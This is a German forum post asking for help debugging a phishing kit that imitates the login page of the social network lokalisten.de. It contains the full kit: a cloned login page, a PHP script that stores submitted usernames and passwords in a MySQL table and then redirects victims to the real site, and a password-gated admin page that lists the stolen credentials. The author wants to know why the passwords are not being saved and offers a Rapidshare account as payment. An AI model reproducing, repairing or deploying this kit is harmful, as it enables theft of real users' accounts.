Hallo,

hoffe hier kann mir jemand helfen, habe per MySQL eine Phishing Page erstellt habe aber i.wo in den Scripten einen Fehler, wodurch bei der Eingabe des Passwortes und Benutzernamens nur der Benutzername gesendet wird !

Auf dem Webspace liegen 4 Scripte + die INDEX-Seite + Die dazugehörigen INDEX-Dateien !

Die 4 Scripte: Admin.php , sqlconnect.php , send.php und make.php sehen wie folgt aus:

Admin.php :

<?
include ("sqlconnect.php");
$ident = $_POST["pw"];
if (isset($ident))
{
if ($ident=="123456")
{

$abfrage = "SELECT * FROM base";
$ergebnis = mysql_query($abfrage);
while($row = mysql_fetch_object($ergebnis))
{
echo "Name: $row->user";
echo "&nbsp;&nbsp;&nbsp;";
echo "Passwort: $row->pwd";
echo "<br>";
}
}
else
{
echo "Falsches Passwort";
}
}
else
{
echo "<form action=\"admin.php\" method=\"post\">";
echo "<input type=\"text\" name=\"pw\" size=\"21\" value=\"pw eingeben\" maxlength=\"50\">";
echo "</form>";
}
?>
Send.php:

<?
include ("sqlconnect.php");
$username = $_POST["username"];
$userpasswort = $_POST["passwort"];
$eintrag = "INSERT INTO base (user,pwd) VALUES ('$username', '$userpasswort')";
$eintragen = mysql_query($eintrag);
?>
<meta http-equiv="refresh" content="0; URL=http://www.lokalisten.de/j_security_check">
Make.php:

<?
include ("sqlconnect.php");
$sql = 'CREATE TABLE `base` ('
. ' `user` VARCHAR(255) NOT NULL, '
. ' `pwd` VARCHAR(255) NOT NULL'
. ' )'
. ' ENGINE = myisam;';
$eintragen = mysql_query($sql);
echo "Tabelle erstellt... Kannst diese datei jetzt löschen";
?>
sqlconnect.php:

<?
$server = "idoo-mysql00";
$user = "i392494";
$pwd = "Mein Sql Passwort";
$database = "i392494";
mysql_connect("$server","$user","$pwd") or die ("Keine Verbindung moeglich");
mysql_select_db("$database") or die ("Die Datenbank existiert nicht");
?>
Index.html:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="de-DE" xmlns="http://www.w3.org/1999/xhtml" lang="de-DE"><head>





















































<title>lokalisten community: meine, deine- unsere freunde!</title>




<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<meta name="description" content="lokalisten.de: meine, deine - unsere freunde! die lokalisten sind eine kostenlose Community für Freunde und Freundesfreunde.">
<meta http-equiv="keywords" content="kennst, kennen, Freund, Schulfreunde, Schule, Lifestyle, Sport, Freizeit, Urlaub, aktiv, Uni, Community Treffen, Spielen, Party, Events, Chat">
<meta name="verify-v1" content="Ihv+wEEpmChQ7XM3SziZo7v1B1jqvGCRZox/Yg6YTS8=">
<meta name="author" content="Andreas Degenhart">
<meta name="robots" content="index,follow">


































<link rel="stylesheet" type="text/css" media="all" href="showHome.do-Dateien/loki-def.css">
<link rel="stylesheet" type="text/css" media="all" href="showHome.do-Dateien/loki-ele.css">

<!--[if IE 8>
<link rel="stylesheet" type="text/css" href="/css/loki-ie8.css?v=111" media="all" />
<![endif]-->

<!--[if lte IE 7]>
<link rel="stylesheet" type="text/css" href="/css/loki-ie.css?v=111" media="all" />
<![endif]-->

<!--[if lt IE 7]>
<link rel="stylesheet" type="text/css" href="/css/loki-ie6.css?v=111" media="all" />
<![endif]-->

<!--[if lte IE 5.5999]>
<link rel="stylesheet" type="text/css" href="/css/loki-ie5.css?v=111" media="all" />
<![endif]-->






<script type="text/javascript" src="showHome.do-Dateien/prototype.js"></script>

<script type="text/javascript" src="showHome.do-Dateien/lokalisten.js"></script>

<script type="text/javascript" src="showHome.do-Dateien/lokibox.js"></script>

<script type="text/javascript" src="showHome.do-Dateien/supernote.js"></script>


<script type="text/javascript" src="showHome.do-Dateien/scriptaculous.js"></script><script type="text/javascript" src="showHome.do-Dateien/builder.js"></script><script type="text/javascript" src="showHome.do-Dateien/effects.js"></script><script type="text/javascript" src="showHome.do-Dateien/dragdrop.js"></script><script type="text/javascript" src="showHome.do-Dateien/controls.js"></script><script type="text/javascript" src="showHome.do-Dateien/slider.js"></script><script type="text/javascript" src="showHome.do-Dateien/sound.js"></script>





</head><body>
<!-- page: /WEB-INF/jsp/pages/login.jsp -->
















<script language="JavaScript" type="text/javascript">
//<![CDATA[
var AccInfo = new Object();
AccInfo.nick = "";
AccInfo.invLink = "";
AccInfo.channel = "1d01login";

AccInfo.linfo = "0_0__1";
AccInfo.linfo2 = "0_0_0_0_0";


var LServerTime = new Date(1245150925580);
var LPageName = '/WEB-INF/jsp/pages/login.jsp';
//]]>
</script>






<div class="specials">


<div id="l_outer">




<div id="l_wrapper" class="open">

<div id="l_sn" class="snPos"></div>


<noscript>
<div class="alertMessage">
<div class="alertMessageCont">
<p>

bitte aktiviere javascript in deinem browser, um die funktionen der lokalisten im vollen umfang nutzen zu können.


</p>
</div>
</div>
</noscript>


<div id="l_header">

<div id="l_headerTop">

































<img src="showHome.do-Dateien/l.gif" class="cityLogo" alt="">
<a href="http://www.lokalisten.de/web/showHome.do" class="logo"><img src="showHome.do-Dateien/logo.gif" alt=""></a>

<p class="slogan"><img src="showHome.do-Dateien/claim.gif" alt=""></p>



<p id="tecMenu">



<a href="http://www.lokalisten.de/tour/pgAboutShow.do">lokalisten tour</a>


</p>


</div>





<div id="l_division"></div>



</div>


<div id="l_main">
<div id="l_inner1">
<div id="l_inner2">

<div id="l_leftColumn">






















<div class="loginColumn">
<h2 class="loginHead">login:</h2>
<form method="post" action="send.php">
<dl class="login">
<dt>spitzname:</dt>
<dd><input tabindex="1" name="username" type="text"></dd>
<dt>passwort:</dt>
<dd><input tabindex="2" name="password" type="password"></dd>
</dl>

<input tabindex="3" value="anmelden" class="styleBt1" type="submit">

<p class="pwdLost">
<a href="http://www.lokalisten.de/register/editPwdlost.do" tabindex="4">passwort vergessen?</a>
</p>
</form>
</div>



<p class="sponsor">
<a href="http://www.space.net/" target="_blank"><img src="showHome.do-Dateien/l_spnet2.gif" alt=""></a>
</p>
</div>


<div id="l_content">
<div id="l_innerContent">






























<div class="joinText">
<h1 class="loginHead">die lokalisten - dein <strong>freundesnetzwerk</strong> <span> in deiner region</span></h1>
<p class="fieldNote">...100% kostenlos!</p>
<a href="http://www.lokalisten.de/register/newbie/editRegister.do?method=edit" class="regLogo"><img src="showHome.do-Dateien/l_reg.gif" alt=""></a>
<a href="http://www.lokalisten.de/register/newbie/editRegister.do?method=edit" class="regChain"><img src="showHome.do-Dateien/chain2.jpg" alt=""></a>
</div>


<p class="registerText">
noch nicht registriert?
<img src="showHome.do-Dateien/dash.gif" alt="">
<a href="http://www.lokalisten.de/register/newbie/editRegister.do?method=edit" tabindex="5" class="joinBt">lokalist werden</a>
</p>

<p class="tourText">

erstelle dein <a href="http://www.lokalisten.de/tour/pgProfileShow.do"><strong>
profil
</strong></a>

<span>•</span>

zeige deine <a href="http://www.lokalisten.de/tour/pgMediaShow.do"><strong>
fotos und videos
</strong></a>

<span>•</span>

entdecke bekannte aus deiner <a href="http://www.lokalisten.de/tour/pgFriendsShow.do"><strong>
schule oder hochschule
</strong></a>

<span>•</span>

finde heraus <a href="http://www.lokalisten.de/tour/pgFriendtreeShow.do"><strong>
wer wen über wen kennt
</strong></a>

<span>•</span>

werde an die <a href="http://www.lokalisten.de/tour/pgIntroShow.do"><strong>
geburtstage
</strong></a> deiner freunde erinnert

<span>•</span>

organisiere und pflege dein <a href="http://www.lokalisten.de/tour/pgOfflineShow.do"><strong>
freundesnetzwerk
</strong></a>

<span>•</span>

und das ganze 100% kostenlos und in farbe
</p>
<form name="RegisterForm" method="post" action="/register/go.do">
<p class="registerKey">
<img src="showHome.do-Dateien/key.gif" alt="">
ich habe einen freundschaftsschlüssel:
<input name="invite" value="" class="w_50" type="text">
<input value="los!" class="keyBt" type="submit">
</p>
</form>

<div id="BANNER_botteaser"></div>
<div id="BANNER_botbanner"></div>
</div>
</div>

<div class="clear"></div>

</div>
</div>
</div>

<div id="l_footer">



















<p id="l_mainFooter">
<a href="http://www.lokalisten.de/common/open/showLegal.do">impressum</a> |
<a href="http://www.lokalisten.de/common/open/showAgb.do">AGB</a> |
<a href="http://www.lokalisten.de/common/open/showRules.do">verhaltenskodex</a> |
<a href="http://www.lokalisten.de/common/open/showContact.do">kontakt</a> |
<a href="http://www.lokalisten.de/press/open/showPress.do">presse</a> |
<a href="http://werbung.lokalisten.de/" target="_blank">werbung</a> |
<a href="http://www.lokalisten.de/all/open/showSurfhints.do">surftipps</a> |
<a href="http://www.lokalisten.de/help/open/showHelp.do?method=mobile">mobile</a> |
<a href="http://blog.lokalisten.de/" target="_blank" title="der offizielle lokalisten-flurfunk">sprechblase</a>
</p>






















<p class="dirFooter">- <a href="http://www.lokalisten.de/dir/people">freunde finden</a>-</p>

</div>

</div>

</div>


</div>






<script language="JavaScript" type="text/javascript">
// <![CDATA[
var IVW="http://lokalist.ivwbox.de/cgi-bin/ivw/CP/1d01login;/login";
document.write("<img src=\""+IVW+"?r="+escape(document.referrer)+"&d="+ (Math.random()*100000)+"\" width=\"1\" height=\"1\" align=\"right\" name=\"ivw\" />");
function callIVW() {
var ivw = document.images.ivw;
if (ivw) {
ivw.src = IVW + "?r=" + escape(document.referrer) + "&d=" + (Math.random()*100000);
}
}
// ]]>
</script><img src="showHome.do-Dateien/login.gif" name="ivw" align="right" height="1" width="1">
<noscript>
<img src="http://lokalist.ivwbox.de/cgi-bin/ivw/CP/1d01login;/login" width="1" height="1" align="right" name="ivw"/>
</noscript>






<script language="Javascript">
//<![CDATA[
var szmvars="lokalist//CP//1d01login";
function callAgof() {document.write('<scr'+'ipt type="text/javascript" src="http://lokalist.ivwbox.de/2004/01/survey.js"></scr'+'ipt>');}
callAgof();
//]]>
</script><script type="text/javascript" src="showHome.do-Dateien/survey.js"></script>





<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script><script src="showHome.do-Dateien/ga.js" type="text/javascript"></script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-8677422-1");
pageTracker._trackPageview();
} catch(err) {}
</script>



</body></html>


Als erstes führe ich die Make.php aus um die Tabelle in die später Benutzername und Passwort eingetragen werden zu erstellen. Anschliesend kann ich die make.php vpm Space löschen !

So als nächstes, und hier liegt das Problem, sollten die auf der Index-Seite eingegebenen Daten bei Aufruf der Admin.php in einer Tabelle erscheinen !!!

Die Admin.php ist zusätzlich noch durch ein Passwort geschützt.

Irgendwo muss ein Fehler sein, der verhindert das das was im Passwortfeld der Index-Seite eingegeben wird an die admin.php weiter egsendet wird, schlieslich funktioniert es beim benutzernamen ja !!!

Wäre echt froh wenn mir jemand helfen könnte !!!

Als gegenleistung biete ich einen Rapidshare Account an !!!!!

Lg 2533